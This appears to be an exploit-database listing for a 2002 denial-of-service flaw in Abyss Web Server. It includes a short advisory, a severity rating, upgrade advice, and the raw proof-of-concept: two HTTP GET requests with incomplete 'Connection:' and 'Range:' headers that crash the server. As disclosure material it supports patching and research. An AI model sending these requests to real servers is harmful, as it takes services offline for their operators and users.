header-logo
Suggest Exploit
vendor:
Abyss Web Server
by:
SecurityFocus
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Abyss Web Server
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

Denial of Service Vulnerability in Abyss Web Server

A denial of service vulnerability has been reported for Abyss Web Server. The vulnerability exists when Abyss attempts to parse certain incomplete HTTP headers. Sending either of the incomplete HTTP headers 'Connection:' and 'Range:' to the server will cause it to crash.

Mitigation:

Upgrade to the latest version of Abyss Web Server
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7287/info

A denial of service vulnerability has been reported for Abyss Web Server. The vulnerability exists when Abyss attempts to parse certain incomplete HTTP headers. 

GET / HTTP/1.0
Connection:

GET / HTTP/1.0
Range:

Navigation

Suggest Exploit

Services By CQR